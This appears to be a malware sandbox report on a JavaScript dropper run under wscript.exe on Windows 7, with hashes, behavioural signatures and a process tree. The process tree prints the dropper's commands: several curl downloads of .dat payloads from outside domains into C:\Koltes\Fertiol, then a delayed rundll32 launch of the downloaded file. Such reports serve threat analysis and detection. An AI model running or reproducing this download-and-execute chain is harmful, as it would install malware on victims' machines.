65efebe64ba9165d4c981c2d32d83f98848d84085cd6721e74c0954dbc553bf7

Analysis

max time kernel
90s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
15/06/2023, 12:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

05929899.js
Size

464KB
MD5

7d5724b6bcbfd42b108e86eaf132062b
SHA1

add4aeb0182ac8dd2d9133275a42dd9df8a8b70c
SHA256

65efebe64ba9165d4c981c2d32d83f98848d84085cd6721e74c0954dbc553bf7
SHA512

f0ea4b12e7826d8e5d90acb2911883f8e6a88577d08a6c09b569f8740d1ba4a8e7128e83fa3a3d802642817aecac14fc4e40315fe811025f0b561a2ca97c5c01
SSDEEP

6144:LmFamddP19SiU+g9ITla9MGNs9yec26VZU6BboaI7CRY7kkh9:oLU3+gPZUW0d

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1336	timeout.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 516	2008	wscript.exe	27
PID 2008 wrote to memory of 516	2008	wscript.exe	27
PID 2008 wrote to memory of 516	2008	wscript.exe	27
PID 2008 wrote to memory of 1232	2008	wscript.exe	28
PID 2008 wrote to memory of 1232	2008	wscript.exe	28
PID 2008 wrote to memory of 1232	2008	wscript.exe	28
PID 2008 wrote to memory of 1980	2008	wscript.exe	30
PID 2008 wrote to memory of 1980	2008	wscript.exe	30
PID 2008 wrote to memory of 1980	2008	wscript.exe	30
PID 2008 wrote to memory of 268	2008	wscript.exe	33
PID 2008 wrote to memory of 268	2008	wscript.exe	33
PID 2008 wrote to memory of 268	2008	wscript.exe	33
PID 2008 wrote to memory of 1756	2008	wscript.exe	35
PID 2008 wrote to memory of 1756	2008	wscript.exe	35
PID 2008 wrote to memory of 1756	2008	wscript.exe	35
PID 2008 wrote to memory of 1856	2008	wscript.exe	36
PID 2008 wrote to memory of 1856	2008	wscript.exe	36
PID 2008 wrote to memory of 1856	2008	wscript.exe	36
PID 2008 wrote to memory of 1640	2008	wscript.exe	38
PID 2008 wrote to memory of 1640	2008	wscript.exe	38
PID 2008 wrote to memory of 1640	2008	wscript.exe	38
PID 1640 wrote to memory of 1336	1640	cmd.exe	41
PID 1640 wrote to memory of 1336	1640	cmd.exe	41
PID 1640 wrote to memory of 1336	1640	cmd.exe	41
PID 1640 wrote to memory of 1276	1640	cmd.exe	42
PID 1640 wrote to memory of 1276	1640	cmd.exe	42
PID 1640 wrote to memory of 1276	1640	cmd.exe	42

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\05929899.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://rapiska.com/0.6884231911163179.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  PID:516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://tamimak.com/0.3644077292847219.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  PID:1232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://corfinka.com/0.520321564990383.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  PID:1980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://qderika.com/0.20172778164519117.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  PID:268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://bilaska.com/0.050673793393401834.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  PID:1756
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://nirause.com/0.13243521176160083.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  PID:1856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\system32\timeout.exe
    timeout 10
    3⤵
    - Delays execution with timeout.exe
    PID:1336
- - C:\Windows\system32\rundll32.exe
    rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
    3⤵
    PID:1276

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads